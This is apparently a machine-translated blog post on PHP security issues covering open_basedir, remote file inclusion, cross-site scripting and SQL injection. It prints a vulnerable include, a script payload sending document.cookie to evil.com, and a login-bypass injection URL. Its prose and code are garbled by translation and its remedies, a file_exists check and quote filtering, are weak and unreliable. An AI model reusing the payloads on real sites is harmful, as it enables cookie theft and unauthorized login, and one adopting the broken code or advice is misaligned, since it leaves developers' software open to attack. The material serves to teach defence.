Baidu a bit. After setting the Open_basedir, only the specified directories and subdirectories under the PHP script will be executed.
Using PHP to read directories or files other than Open_basedir will complain
Insufficient permissions
General virtual host vendors are set to/TMP and/home
This is the user's habit, we have to find a way to solve these problems, the following summed up some of the PHP security issues.
1.include should be careful to determine whether you have this file locally, so as not to create security vulnerabilities.
Like what:
The code is as follows |
Copy Code |
<?php Include $module. '. PHP '; ?> |
This assumes that $module is a function/42833.htm target=_blank > global variable.
This script gives the attacker the opportunity to execute any PHP code on your server, such as adding a module=http://example.com/my after the browser URL. When PHP receives this URL, the value of the "$module" variable in the script is set to http://example.com/my. So it's dangerous when PHP executes the include ...
Workaround: When you close the register_globals or include in php.ini, judge it.
The code is as follows |
Copy Code |
<?php if (file_exists ($module. ') php ')) { Include $module. '. PHP '; } ?> |
2. Run the script across the station.
Simply put, attackers can execute client-side scripts, such as JS, in the user's browser, and then steal cookies or other important data from users.
Like <script language= ' JavaScript ' >document.location=? Http://evil.com/cgi-bin/cookie.cgi?f= ' +document.cookie</script>
If you click on the button, your local cookie information will be sent to someone's mailbox (this shows how easy it is for you to make a website that steals user information).
3.SQL Injection
Personally feel that the SQL of their own flexibility, ease of use to bring their own negative impact.
The code is as follows |
Copy Code |
<?php $query "Select login_id from Users where user= ' $user ' and pwd= ' $PW '"; mysql_query ($query); ?> |
Like the person who wrote
Http://example.com/login.php?user=admin '%20or%20 (user= ' &pwd= ')%20r%20user= '
Your PHP code may become.
The code is as follows |
Copy Code |
<?php $query = "Select login_id from user where user= ' admin ' or (user = ' and pwd= ') or user= '"; mysql_query ($query); ?> |
Can filter by function, filter out (') ("), () etc.